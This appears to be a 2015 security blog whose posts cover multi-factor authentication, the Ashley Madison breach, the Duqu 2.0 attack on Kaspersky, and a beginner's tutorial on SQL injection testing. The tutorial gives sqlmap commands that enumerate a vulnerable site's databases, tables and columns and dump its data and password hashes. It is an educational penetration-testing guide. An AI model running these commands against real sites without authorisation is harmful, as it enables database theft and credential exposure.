Service providers such as Apple's iCloud, GMail, eBay and Facebook give the option to switch on two-step verification, where if you try to login from a new device, a new browser or a different country, the user will be prompted to enter a code that is sent to the registered mobile phone number.  The security is there and it's free.

The use of multi factor authentication is accepted as commonplace and widely used for by users for personal services, such as email and banking.


Recent technology adoption within a corporate environment has been driven by domestic technology.  The rise of wireless, tablet and mobile computing has been driven from the use of these technologies within the domestic environment.

There is often a concern that the user community with an organisation struggles with new technology, but it's often the enforcement of unfamiliar technology that causes the user to become disengaged.

The use of multi factor authentication can only strengthen a network or website, and with this technology used for personal consumption, the use corporately will offer less resistance from the user community, especially if there is a familiarity with the technology.

Cloud Support

As more corporate applications move to the Internet, cloud security becomes the concern of every IT Manger, IT Director, CSO, CISO, and in fact every member of an executive team.

As cloud based applications such as Salesforce and Microsoft Office 365 become popular, it is essential to remember these applications are the very lifeblood of an organisation.  The need for security and multi factor authentication become more apparent when looking to protect these web based applications. There are protocols such as SAML designed to support cloud applications, and offer multi factor authentication.

Impact to the business

A poorly designed or poorly designed solution will impact the user adoption of any technology, but a familiar system will offer acceptance and executive sponsors.  Security is high on the executive boards agenda, so the impact of a compromise or a disgruntled employee is greater than financial considerations such as return on investment. 

Multi factor authentication is not new, but is an obvious solution the the many security challenges for organisations, whether the data and applications are located on premise, in data centres, in public cloud, in private cloud or a hybrid approach.  Security is no longer the concern of technical sponsors, but of the Executive Board.

Familiar security solutions such as Multi Factor Authentication, can only increase the security posture of an organisation, protecting the data and reputation of an organisation. 

Wednesday 22 July 2015

Morality vs Criminality: Ashley Madison Hack

As you may have read in the press, that the Ashley Madison website was hacked.   What's the big deal, you may think, it's another compromised website.  Ashley Madison,as it says on their website, "is the online personals & dating destination for casual encounters, married dating, discreet encounters and extramarital affairs", with the tagline is "Life is short, have an affair".  There are 37 million users, across over 50 countries, with around 1.2 million of whom live in the UK.

What was lost?

Personal data that was lost includes, names, postal addresses, credit card numbers and sexual fantasies.  Made worse is the organisation charged a $19 fee to carry out a "full delete" on user accounts, which appears to have not been the case.

Who did it?

The hackers taking responsibility are the Impact Team, where the database was comprehensively stolen.  In a recent article from The Guardian, it states that it was an insider threat, where the compromise was carried out by someone who had access to the systems, but was not an employee, highlighting the need for control on third party access.


I've read a few comments that said that people should not be using these sorts of sites.  A crime has been committed in the database being stolen, but we are judging the victim for the crime.  Who is to blame if your house is broken into?  The criminal or the victim?  


Be aware that there is no safe place on the internet.  The internet is effectively a public place, where a majority of people will have access.  You are entrusting a third party to look after your data, so in this case, a secure and unique password would not have helped the users.

The fault here lies with Ashley Madison.  Some security technologies would have prevented this from happening:  

  • A Privileged Account Security solution would have prevented the third party from recycling their access to the system, and with some solutions recorded the sessions of compromise.
  • A database encryption solution would have prevented the data from being used.
  • A Data Leak Prevention (DLP) solution would have prevented the data from exfiltrating the organisation.
  • A Security Analytics solution would have seen and prevented this.
I have mentioned the Cyber Kill Chain in the past, and these solutions would have stopped the compromise, and the data leaving the organisation.

For me, this is not a case about morality, but we allow that to cloud our thoughts and allow a criminal act to be downplayed because of it.  This is a crime, but worse a crime that could have been prevented.  The right solutions configured correctly, supported by polices and procedures would have prevented this hack from happening.

Monday 20 July 2015

Web Application Testing - Hacking with KALI Linux

Web Application Testing for beginners

I was asked to give a presentation on Web Application Testing, so as well as supporting information as to why and what a test involves, I highlighted why OWASP was important, and showed how easy a simple a SQL injection attack is to carry out.


Who or what are OWASP?  Wikipedia gives the definition as: “The Open Web Application Security Project is an online community dedicated to web application security.  The OWASP community includes corporations, education organizations and individuals from around the word”

OWASP gives information on security coding of web applications and following their guidelines will help ensure the development of secure web applications and that the security standards are upheld as part of this process.

KALI Linux

A common penetration testing tool is KALI Linux, which is available here as software or here as a virtual machine.  It’s a suite of testing tools that run on Linux, and includes tools to test web applications.


One of toolsets found in KALI Linux is to a tool called OWASP ZAP, which will test websites for vulnerabilities.  It’s a vulnerability assessment (VA) tool for web applications.

You enter in the website you want to test against.  I have to say ensure you have the permission of the owner of the website, although there are many websites that can be tested against.


One of the vulnerabilities that OWASP ZAP can test for are SQL injections.  Wikipedia defines SQL Injections as: "SQL injection is a code injection technique, used to attack data-driven applications, in which malicious SQL statements are inserted into an entry field for execution (e.g. to dump the database contents to the attacker)"

Find Database

Once you have a site that is vulnerable to an SQL injection, you can use the SQLMAP tool on KALI via a Terminal session.

To use SQLMAP to check a website for a database, use the following line of code:

sqlmap -u <vulnerable site url> --dbs

This command will show if there are any databases available on the site

Find Tables

Once you have the database information, the next task will be see what tables are available on that database, and that can be done using the following code:

sqlmap -u <vulnerable site> -D <database name> --tables

Once you have the tables, you’ll probably want to have a closer look at any interesting ones.

Find Columns

Once you find an interesting table, it would be useful to see what is available in the columns, which can be done using the following code:

sqlmap -u <vulnerable site> -D <database name> -T <table> --columns

Dump Data

Now you have the column information, it would be useful to dump the data, using the following code:

sqlmap -u <vulnerable site> -D <database name> -T <table> --dump

Once the data has been dumped, you’ll be asked if you want to use external tools to analyse the data, performing an attack using a default dictionary attack and whether you want to ignore common suffixes.

Review Data

Copy and paste the data into Leafpad to view the data, where you’ll see passwords as hashes, and where they are common passwords in the default dictionary, then they will be displayed as clear text.


As you can see, with very little experience, it’s incredibly easy to check for vulnerabilities and use simple commands to perform some very powerful tests against the sites.  The recommendation is to have any web application development team to follow the OWASP Top 10 and ensure regular testing against your web applications.  If you are commissioning an external organisation, ensure they are offering an SLA to delivering a secure application, so they have to pull the stops out to ensure security is built in, rather than it being of additional expense to you and your organisation for not building this into the contract.

Monday 29 June 2015

Duqu 2.0

On the 9th June 2015, Kaspersky announced to the world that they had been a victim of a cyber attack that targeted their own corporate network.  If an organisation like Kaspersky can become a victim of a cyber attack of this magnitude, all organisations can potentially become victims.  Data is the lifeblood of any organisation and the loss of critical data could mean the demise of that organisation.

Kaspersky, a Moscow-based security company, disclosed details of a cyber attack that they had been victim of.  After its discovery, Kaspersky launched an extensive investigation, gathering the facts and sharing the findings with the world.  The attack was dubbed Duqu 2.0, due to its similarity to an attack known as Duqu which was first spotted in 2011.  The use of Duqu and Duqu 2.0 is attributed to nation-state sponsored attacks, in this case trying to discover intellectual property, such as research into advanced persistent threats (APTs).

Cyber Kill Chain
The comprehensive nature of the attack meant it was highly likely to succeed.   Lockheed-Martin’s Cyber Kill Chain breaks down a cyber attack into seven steps.  Some attacks may only use some of these steps, while others will repeat them when attacking multiple systems prior to attacking the intended target.  The Duqu 2.0 attack not only followed the kill chain, but there were also elements repeated to make the attack more covert.

Reconnaissance/Weaponisation/Delivery /Exploitation
It is believed that an employee in one of the APAC offices was a target of a spear-phishing email, with a lure and redirect to a malicious dropper file that exploited a specific unpatched zero day vulnerability.  The attack was thorough, ensuring emails and browser history were cleared of all traces of the compromise.  Kaspersky confirm the machine was fully patched leading to the assumption of a zero day exploitation.

Once on the network, the attacker was able to escalate unprivileged credentials to that of the Windows domain administrator using another zero day vulnerability. The attacker was then able to explore the network by moving laterally and deciding which machines to compromise.  Microsoft Windows Installer Packages were used to deploy Duqu 2.0 into the network.  The attack software runs in memory, where most modern production servers have high uptimes and are rarely power cycled.  Had the machine been power cycled, it would have quickly been re-infected.

Command and Control/Action on Objectives
Once the desired information was found by the attacker, the data was exfiltrated out of the network.  Kaspersky have reported that non-critical information was taken as part of the attack.

By analysing the sequence of the attack, a number of mitigating controls could be used to prevent the Duqu 2.0 and similar attacks.  Many of these elements may have been caught in isolation, but the prevention of the attack would need a more integrated approach to security.  The end goal for the attacker is to steal data.

The entry point to the network was to specifically target an individual or small group of people.  This highlights the need for user education at every level and every department of an organisation.  In conjunction with education, an email security gateway with sandboxing technology may have prevented Duqu 2.0 from entering the network.

Web Access
An exploit kit would have been introduced to the network to check for unpatched and zero day vulnerabilities.  This was delivered through the web vector as a malicious link or a compromised site with a malicious file.  The presence of this could have been detected with a web security gateway, ideally with a sandboxing solution to check the functionality of the file.

Zero Day vulnerabilities
The patching of operating systems, browsers, third party software and plug-in is highly recommended, although this will not prevent zero day vulnerabilities from being exploited.  The removal of non-essential software from a computer will help reduce the surface area of attack, and the use of host based firewalls and host intrusion protection system can help.

Administrative Credentials
The administrative credentials within the network were compromised, which allowed the lateral movement within the network.  This is a shortcoming of using static passwords for a period of time before being cycled; giving a window of exposure if the password is compromised.  A privileged access management solution, would cycle the administrative credentials after each use and video record each session.  This would give a greater level of security to the credentials and traceability on what each administrative session had executed.

Lateral Movement
Many networks are segmented using VLANs, which offer limited security.  Micro-segmentation would provide protection to the servers or groups of servers, with security controls to prevent the East-West movement within a network.  When coupled with a security analytics engine, this would give context to the abnormal traffic within the network.

Resident in memory
As Duqu 2.0 resides in memory, there are a number of mitigations that could have prevented this.  The simple act of rebooting the server would have cleared the application from memory, although this can be difficult to routinely perform on critical production servers.  Whitelisting application control solutions would have stopped the MSI from executing into memory by simply preventing the unknown application from running. 

Data Exfiltration
A gateway data loss prevention solution would have seen the data leaving the network.  It is especially important that the solution is able to analyse the data being drip fed out, piecing together many smaller exfiltrations to gain visibility of the overall loss and give context to the data leaving.

The Future
The Duqu 2.0 attack follows the seven stage cyber kill chain. Preventing the attack at any one of those steps would have ultimately stopped data loss.  Kaspersky caught the attack before critical data loss had occurred.  As attacks such as these are published it raises the profile for both vendors and attackers.  These techniques could still be used against any organisation, with the ultimate goal of stealing data.

To prevent these attacks, security vendors will need to take a more holistic view of security working with other vendors to specialise in the areas they don’t.  We see this collaborative working with technical partnerships by vendors, and with OEM agreements in the supply point solutions.  Alternatively security vendors need to take a more comprehensive approach tackling all the stages of the kill chain with integrated solutions.

The solutions need to become less reactive to the known and more proactive to the unknown.  There needs to be more focus on how security solutions deal with anomalies, where prevention and remediation is far more important than notification.  With a security staff shortage and the gap growing year on year, the vendors have the supply security intelligence in their solutions. The future for these solutions is not to supply data logs and notifications, but to provide context and proactive remediation through intelligent analytics.

In the short term, ensure endpoint security solutions are running the latest versions, with the latest updates and the recommended features are enable.  There needs to be a focus on running supported operating systems, with the latest patches, and to ensure that third party software and plugs-ins are updated as well.  Any web and email security solutions need to be updated and the security policies regularly reviewed.  The final piece is user education, which should be ongoing process, where the learning is engaging, flexible and relevant.

As these attacks become more mainstream where vertical and size no longer matter, look to future solutions that are able to tackle all stages of the kill chain, providing intelligence and context; and ultimately prevent the organisation’s data from entering the wrong hands.